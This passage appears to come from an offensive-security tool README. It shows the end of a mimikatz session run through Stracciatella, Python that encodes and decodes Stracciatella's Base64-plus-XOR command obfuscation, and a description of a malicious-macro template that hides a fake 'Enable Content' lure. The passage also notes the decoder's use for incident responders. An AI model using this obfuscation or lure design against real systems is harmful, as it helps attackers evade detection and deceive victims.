'#####' with 20 modules * * */
mimikatz(powershell) # coffee
( (
) )
.______.
| |]
\ /
`----'
mimikatz(powershell) # ;
```
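As an added example (my own code, not Stracciatella's), the following Python implements the parameter encoding its `-b` (Base64) and `-x <key>` (single-byte XOR) switches expect, in both directions, and checks it against the `-c` argument from the transcript above. The order of operations is inferred from that transcript rather than from the tool's source: the blob Base64-decodes first and the result XORs with `0x31` into the `Write-Host` command that the session echoes, so encoding applies XOR first and Base64 second.

```python
# Added example, not Stracciatella's code: Base64 + single-byte-XOR parameter
# encoding in both directions (XOR then Base64 on the way in; Base64 then XOR on
# the way out), verified against the README's own -c argument.
import base64

# The -c argument from the Stracciatella transcript above.
PAGE_BLOB = ("ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5f"
             "cl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; it is its own inverse, so it serves both directions."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte (0-255)")
    return bytes(b ^ key for b in data)


def encode_param(text: str, key: int = 0, b64: bool = True) -> bytes:
    """Produce a value for -c (or a script file) matching the -x/-b switches you
    will pass on the command line: key=0 skips XOR, b64=False skips Base64."""
    data = text.encode("utf-8")
    if key:
        data = xor_bytes(data, key)
    if b64:
        data = base64.b64encode(data)
    return data


def decode_param(blob, key: int = 0, b64: bool = True) -> str:
    """Reverse encode_param. Accepts str or bytes so a value copied from a
    command line or a captured process tree can be fed in directly."""
    data = blob.encode("latin-1") if isinstance(blob, str) else bytes(blob)
    if b64:
        data = base64.b64decode(data)
    if key:
        data = xor_bytes(data, key)
    return data.decode("utf-8")


if __name__ == "__main__":
    # Decode the README's blob with the -x 0x31 key used in the transcript.
    print(decode_param(PAGE_BLOB, key=0x31))
    # Round-trip a constructed command with a different key.
    print(encode_param("Get-Process", key=0x5A).decode("ascii"))
```

The same decoder is what a responder wants when a Stracciatella-style command line shows up in process creation telemetry: the XOR key is right there in the arguments, so the obfuscation only hides the command from naive string matching, not from anyone who reads the command line.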
- SubstitutePageMacro.vbs
  - A template for malicious macros that want to replace the document's primary contents (such as a luring/fake "Enable Content" warning) with whatever is inside an AutoText named `RealDoc` (configured via the `autoTextTemplateName` variable). (gist)